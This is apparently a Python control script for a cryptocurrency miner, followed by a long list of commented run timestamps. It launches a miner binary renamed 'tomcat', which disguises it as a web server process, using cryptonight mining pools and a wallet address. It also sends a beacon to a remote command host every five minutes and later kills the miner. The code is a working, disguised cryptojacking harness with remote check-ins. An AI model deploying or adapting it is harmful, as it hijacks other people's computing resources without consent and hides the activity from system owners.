import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:05.192196
#2018-02-17 16:45:09.995984
#2018-02-17 18:32:07.854829
#2018-02-17 20:20:01.551852
#2018-02-17 22:06:07.448087
#2018-02-17 23:51:06.010509
#2018-02-18 01:41:06.165668
#2018-02-18 03:28:01.445223
#2018-02-18 05:16:05.698510
#2018-02-18 07:08:04.686294
#2018-02-18 08:56:04.015871
#2018-02-18 10:43:01.335362
#2018-02-18 12:28:08.040627
#2018-02-18 14:16:03.888823
#2018-02-18 16:06:05.652659
#2018-02-18 17:54:02.207890
#2018-02-18 19:41:01.234770
#2018-02-18 21:25:08.494294
#2018-02-18 23:14:05.913386
#2018-02-19 01:01:05.558957
#2018-02-19 02:48:05.887675
#2018-02-19 04:33:07.595121
#2018-02-19 06:18:05.972172
#2018-02-19 08:05:08.600701
#2018-02-19 09:55:06.658005
#2018-02-19 11:44:06.361537
#2018-02-19 13:31:04.351971
#2018-02-19 15:19:06.614554
#2018-02-19 17:07:04.477222
#2018-02-19 18:56:08.723628
#2018-02-19 20:44:05.943239
#2018-02-19 22:31:01.338382
#2018-02-20 00:16:06.079136
#2018-02-20 02:03:07.617061
#2018-02-20 03:53:07.052315
#2018-02-20 05:37:01.508084
#2018-02-20 07:22:07.733814
#2018-02-20 09:09:07.061103
#2018-02-20 10:52:08.786707
#2018-02-20 12:41:03.994942
#2018-02-20 14:26:01.554351
#2018-02-20 16:10:14.903448
#2018-02-20 17:57:10.647437
#2018-02-20 19:48:07.156753
#2018-02-20 21:37:02.193851
#2018-02-20 23:18:04.601559
#2018-02-21 01:03:07.277996
#2018-02-21 02:51:06.659541
#2018-02-21 04:40:05.659382
#2018-02-21 06:28:04.452747
#2018-02-21 08:14:05.868941
#2018-02-21 10:00:08.500717
#2018-02-21 11:47:09.871109
#2018-02-21 13:39:06.744200
#2018-02-21 15:23:04.752442
#2018-02-21 17:14:08.422409
#2018-02-21 19:02:07.386818
#2018-02-21 20:49:04.105976
#2018-02-21 22:33:08.113209
#2018-02-22 00:24:05.820335
#2018-02-22 02:12:05.415159
#2018-02-22 03:57:05.812931
#2018-02-22 05:44:05.927044
#2018-02-22 07:29:06.838319
#2018-02-22 09:18:06.091374
#2018-02-22 11:05:08.049270
#2018-02-22 12:50:01.548178
#2018-02-22 14:36:08.267892
#2018-02-22 16:22:01.918696
#2018-02-22 18:09:01.696016
#2018-02-22 19:57:06.031535
#2018-02-22 21:48:04.557489
#2018-02-22 23:34:07.863592
#2018-02-23 01:22:07.691739
#2018-02-23 03:09:02.043709
#2018-02-23 04:55:07.031561
#2018-02-23 06:40:10.012148
#2018-02-23 08:29:06.755022
#2018-02-23 10:44:07.623085
#2018-02-23 12:41:06.673226
#2018-02-23 14:26:04.446344
#2018-02-23 16:16:07.142253
#2018-02-23 18:04:03.078065
#2018-02-23 19:49:04.187389
#2018-02-23 21:32:06.782533
#2018-02-23 23:20:01.497002
#2018-02-24 01:09:07.592977
#2018-02-24 03:01:06.484064
#2018-02-24 04:47:01.284045
#2018-02-24 06:31:01.620869
#2018-02-24 08:19:01.603203
#2018-02-24 10:04:02.062235
#2018-02-24 12:01:04.243330
#2018-02-24 13:48:03.924484
#2018-02-24 15:45:01.526361
#2018-02-24 17:38:07.317945
#2018-02-24 19:23:05.870770
#2018-02-24 21:14:06.971424
#2018-02-24 23:50:01.239302
#2018-02-25 03:42:03.829363
#2018-02-25 07:27:04.791079